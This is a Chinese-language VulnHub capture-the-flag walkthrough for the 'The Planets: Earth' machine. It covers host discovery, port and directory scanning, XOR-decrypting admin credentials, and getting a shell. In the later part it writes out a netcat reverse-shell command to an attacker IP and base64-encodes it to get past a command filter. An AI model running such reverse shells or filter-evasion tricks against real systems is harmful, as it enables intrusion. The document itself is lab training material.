The Planets Earth

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.134.0/16   |   Screen View: Unique Hosts                                                       

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:6f:27:91      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.229  08:00:27:c0:ac:18      1      60  PCS Systemtechnik GmbH     

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.229

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.229 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-10 08:40 EST
Nmap scan report for bogon (192.168.56.229)
Host is up (0.00034s latency).
Not shown: 65382 filtered tcp ports (no-response), 150 filtered tcp ports (admin-prohibited)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:C0:AC:18 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.33 seconds

NMAP扫描出识别出主机名： earth.local, terratest.earth.local,将其加入/etc/hosts文件中。

┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ sudo vim /etc/hosts                                        

┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ cat /etc/hosts             
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.229  terratest.earth.local
192.168.56.229  earth.local

获得Shell

访问80端口，需要访问主机名而不是IP地址。

──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ gobuster dir -u http://earth.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://earth.local
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/10 21:40:27 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 0] [--> /admin/]
Progress: 220100 / 220561 (99.79%)===============================================================
2022/12/10 21:43:51 Finished
===============================================================
                                                                               

┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ curl -k https://terratest.earth.local/robots.txt
User-Agent: *
Disallow: /*.asp
Disallow: /*.aspx
Disallow: /*.bat
Disallow: /*.c
Disallow: /*.cfm
Disallow: /*.cgi
Disallow: /*.com
Disallow: /*.dll
Disallow: /*.exe
Disallow: /*.htm
Disallow: /*.html
Disallow: /*.inc
Disallow: /*.jhtml
Disallow: /*.jsa
Disallow: /*.json
Disallow: /*.jsp
Disallow: /*.log
Disallow: /*.mdb
Disallow: /*.nsf
Disallow: /*.php
Disallow: /*.phtml
Disallow: /*.pl
Disallow: /*.reg
Disallow: /*.sh
Disallow: /*.shtml
Disallow: /*.sql
Disallow: /*.txt
Disallow: /*.xml
Disallow: /testingnotes.*

猜测扩展名是.txt即，/testingnotes.txt

┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ curl https://terratest.earth.local/testingnotes.txt -k
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

从testingnotes.txt文件可知：

1. admin portal的用户名是terra

2. 首页中的信息加密算法是XOR

3. XOR中的key可能来自于testdata.txt

┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ curl https://terratest.earth.local/testdata.txt -k    
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

打开在线网站cyberchef, XOR的key即为testdata.txt的内容：

而加密的信息是首页中的第三段十六进制数据：

2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

从而admin portal的密码为：

earthclimatechangebad4humans

也就是说用户名：

username: terra

password:earthclimatechangebad4humans

登录admin portal,登录成功后为命令执行窗口:

当时输入：nc -e /bin/bash 192.168.56.206 5555

得到错误提示：Remote connections are forbidden.

需要用base64 编码：

┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ echo 'nc -e /bin/bash 192.168.56.206 5555' | base64                    
bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNTYuMjA2IDU1NTUK

然后在命令框输入：

echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNTYuMjA2IDU1NTUK | base64 -d | bassh

┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.229] 40676
id
uid=48(apache) gid=48(apache) groups=48(apache)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bash-5.1$ ls

在Kali Linux成功得到了shell

提权